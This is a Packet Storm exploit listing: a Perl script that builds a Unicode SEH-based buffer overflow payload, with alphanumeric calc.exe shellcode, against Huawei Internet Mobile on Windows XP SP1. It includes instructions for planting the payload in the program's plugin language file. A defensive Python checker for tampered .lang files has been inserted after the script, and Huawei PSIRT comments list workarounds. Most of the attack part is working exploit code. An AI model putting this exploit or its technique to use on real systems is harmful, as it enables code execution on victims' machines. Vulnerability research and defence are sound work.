
Huawei Internet Mobile Overflow
Posted Sep 16, 2012
Authored by Dark-Puzzle

Huawei Technologies Internet Mobile Unicode SEH-based buffer overflow exploit. Works only on Windows XP SP1.

tags | exploit, overflow
systems | windows, xp
MD5 | 1365389cc7039d81b94991d8bd4086cc

#!/usr/bin/perl
# Title : Huawei Technologies - Internet Mobile 0day Unicode SEH-based vulnerability.
# Author : Dark-Puzzle
# Versions : All versions are vulnerable; the behaviour of the program when exploiting may vary from one OS to another.
# Vulnerable by vendor : Morocco - Meditel 3G & Maroc Telecom 3G.
# RISK : Critical.
# Type : Local / Remote.
######################################################
# Video : https://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )
#####################################################
#---------------------------------------------------------------------
# Use it at your own risk #
###---------------------------------------------------------------------
# Info : This exploit works only on WinXP SP1, because it is almost impossible to execute it on Win7 & WinXP SP2/SP3: this program has been compiled with SafeSEH enabled.
# So on other versions of Windows you will not find any valid Unicode-compatible address in a module without SafeSEH, neither in OS modules nor in program modules.
# That's why I will just give you an idea for Win7 & XP SP1/SP2 (look DOWN)!
# Anyway this exploit works perfectly on Windows XP SP1.
# Here it is; the video explains the usage =) : http://www.youtube.com/watch?v=pkOaPQJPQbE (Windows XP SP1 + Windows 7 )
###

# How to use this exploit on Windows XP SP1 (or watch my video):
# First go to C:\program files\Internet Mobile\plugins\SMSUIPlugin\SMSUIPlugin_fr-fr.lang or _en-fr.lang (according to the program language).
# Then put the output of this Perl program in <item name="IDS_PLUGIN_NAME">HERE !!</item>. Save it and open the program.
# Unlike on Win7 & WinXP SP2/SP3, this exploit requires you to click in the top menu "Operation" --> "Message texte" !! Bingo. Calc.exe just showed up =) .
# English : "Operation" --> "Text Message"

my $size = 43680; # Total size of the padded payload
my $junk = "A" x 146 ; # Offset to the SEH record
my $nseh = "\x61\x62"; # Popad + Align .
my $seh = "\x88\xDC"; # p/p/r From OLE32.DLL ( Windows XP SP1 Only)
# The Venetian Shellcode :
my $ven =
"\x6e". # Align Code
"\x53". # push ebx
"\x6e". # Align Code
"\x58". # pop eax
"\x6e". # Align Code
"\x05\x17\x11". # add eax, 0x11001700
"\x6e". # Align Code
"\x2d\x16\x11". # sub eax, 0x11001600
"\x6e". # Align Code
"\x50". # push eax
"\x6e". # Align Code
"\xc3"; # ret

my $more = "D" x 108 ; # Exact Value To Make the Venetian shellcode work.

# CALC.exe Shellcode .
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPA3QADAZA".
"BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA".
"58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB".
"AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K".
"22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL".
"MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55".
"Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V".
"NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB".
"R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT".
"NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU".
"89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM".
"KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC".
"QQ2LRCM0LJA";


my $morestuff = "D" x ( $size - length($junk.$nseh.$seh) ); # Pad up to $size
my $payload = $junk.$nseh.$seh.$ven.$more.$shellcode.$morestuff;
open(my $fh, '>', 'mobile.txt') or die "Cannot write mobile.txt: $!";
binmode($fh); # Write the raw bytes unchanged
print $fh $payload;
close($fh);
print "This program has written ".length($payload)." bytes\n";

##########################################################
# For Windows XP SP2 / SP3 and Windows 7 32/64 bits: comment out the script above and remove the leading # from each line of the script below.
##########################################################
# When the value of <item name="IDS_PLUGIN_NAME"></item> is changed, the program crashes directly when it is opened and behaves differently from WinXP SP1.

#my $totalsize = 43680 ;
#my $junk = "A" x 182 ;
#my $nseh = "\x42\x42"; # Overwriting the pointer to next SEH with 0x42004200
#my $seh = "\x43\x43"; # Overwriting SEH with 0x43004300
#my $morestuff = "D" x ( 43680-length($junk.$nseh.$seh));

#$payload= $junk.$nseh.$seh.$morestuff;
#open(myfile,'>mobile.txt');
#print myfile $payload;
#close(myfile);
#print "Wrote ".length($payload)." bytes\n";

#############################################################
# Datasec Team .
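As an added defensive check (not part of the original exploit or of Huawei's software), the following Python script flags a tampered SMSUIPlugin .lang file: the delivery vector above is an IDS_PLUGIN_NAME value tens of kilobytes long made of repeated padding, so excessive length, long runs of one character and non-printable characters are the tells. The sample file contents, the 64-character limit, the 32-character run threshold and the UTF-8 encoding are assumptions.

```python
import re

# Constructed sample .lang contents (not real Huawei files): one with a normal plugin
# name and one with the oversized IDS_PLUGIN_NAME that the exploit above writes there.
BENIGN_LANG = '<lang>\n  <item name="IDS_PLUGIN_NAME">Text Message</item>\n</lang>\n'
CRAFTED_LANG = ('<lang><item name="IDS_PLUGIN_NAME">' + "A" * 146 + "D" * 300
                + '</item></lang>')

MAX_NAME_LEN = 64   # assumed sane upper bound for a plugin display name
MIN_RUN = 32        # assumed: a run of 32+ identical characters is padding, not a name

def extract_items(lang_text):
    """Map item name -> value for every <item name="...">value</item> entry."""
    return dict(re.findall(r'<item name="([^"]+)">(.*?)</item>', lang_text, re.S))

def check_plugin_name(lang_text, max_len=MAX_NAME_LEN, min_run=MIN_RUN):
    """Return a list of findings about IDS_PLUGIN_NAME; an empty list means nothing odd."""
    value = extract_items(lang_text).get("IDS_PLUGIN_NAME")
    if value is None:
        return ["IDS_PLUGIN_NAME missing"]
    findings = []
    if len(value) > max_len:
        findings.append(f"IDS_PLUGIN_NAME is {len(value)} chars, limit is {max_len}")
    # A run of min_run or more identical characters is the signature of overflow padding.
    run = re.search(r"(.)\1{%d,}" % (min_run - 1), value)
    if run:
        findings.append(f"run of {len(run.group(0))} repeated {run.group(1)!r} characters")
    if not value.isprintable():
        findings.append("non-printable characters in IDS_PLUGIN_NAME")
    return findings

def check_lang_file(path):
    """Scan an on-disk .lang file; the encoding is assumed to be UTF-8 (replace on error)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return check_plugin_name(fh.read())

if __name__ == "__main__":
    for label, text in (("benign", BENIGN_LANG), ("crafted", CRAFTED_LANG)):
        print(label, check_plugin_name(text) or "OK")
```

Point check_lang_file at the installed SMSUIPlugin_*.lang files to verify none has been tampered with; a clean install should report nothing.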

Comments (3)

psirt2012

Currently, workarounds are available and are listed below. Huawei has also made the version plan to resolve this vulnerability.

Temporary Fix:
Users of Windows can upgrade the operating system to Windows XP SP3 directly, or can download UTPS2.0 from our web site to cope with the security vulnerability.
1. Users of Windows XP SP1 can log in to the Microsoft web site to install the Windows XP SP3 patch.
2. Users of higher versions of the operating system will not be affected.

Software Versions and Fixes:
The affected products below can deploy the workarounds mentioned above to mitigate the risks, or be upgraded to the versions below:

Product Model   Back-End Version        Solved Version                              Solved Time
E173u-1         UTPS11.302.09.06.162    UTPS21.005.22.00.162_MAC21.005.22.01.162    2012-9-26
E153u-1         UTPS11.302.09.05.162    UTPS21.005.15.06.162_MAC21.005.15.01.162    2012-9-26

The other affected products can deploy the workarounds mentioned above to mitigate the risks; there is no new version or patch to be released.

Comment by psirt2012
2012-10-17 03:59:41 UTC | Permalink | Reply
psirt2012

Currently, workarounds are available and are listed below. Huawei has also made the version plan to resolve this vulnerability.

The link to the Huawei Security Advisory is below:
www.huaweidevice.com/worldwide/faq.do?me…

Temporary Fix:
Users of Windows can upgrade the operating system to Windows XP SP3 directly, or can download UTPS2.0 from our web site to cope with the security vulnerability.
1. Users of Windows XP SP1 can log in to the Microsoft web site to install the Windows XP SP3 patch.
2. Users of higher versions of the operating system will not be affected.

Software Versions and Fixes:
The affected products below can deploy the workarounds mentioned above to mitigate the risks, or be upgraded to the versions below:

Product Model   Back-End Version        Solved Version                              Solved Time
E173u-1         UTPS11.302.09.06.162    UTPS21.005.22.00.162_MAC21.005.22.01.162    2012-9-26
E153u-1         UTPS11.302.09.05.162    UTPS21.005.15.06.162_MAC21.005.15.01.162    2012-9-26

The other affected products can deploy the workarounds mentioned above to mitigate the risks; there is no new version or patch to be released.

Contact channel for technical issues:
PSIRT@huawei.com

Comment by psirt2012
2012-10-17 04:06:47 UTC | Permalink | Reply
psirt2012

Currently, workarounds are available and are listed below. Huawei has also made the version plan to resolve this vulnerability.

Please check the link below:
www.huaweidevice.com/cn/faq.do?method&#6…

Comment by psirt2012
2012-10-18 07:39:01 UTC | Permalink | Reply

© 2019 Packet Storm. All rights reserved.